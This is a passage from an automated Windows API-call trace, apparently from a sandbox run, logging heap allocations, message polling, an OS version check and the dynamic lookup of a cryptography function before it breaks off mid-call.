[0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.028] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.030] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.031] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.032] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0261.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0261.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.034] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.035] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.035] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.036] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.036] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0261.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.041] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0261.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0261.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0261.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.041] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0261.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0261.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.042] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 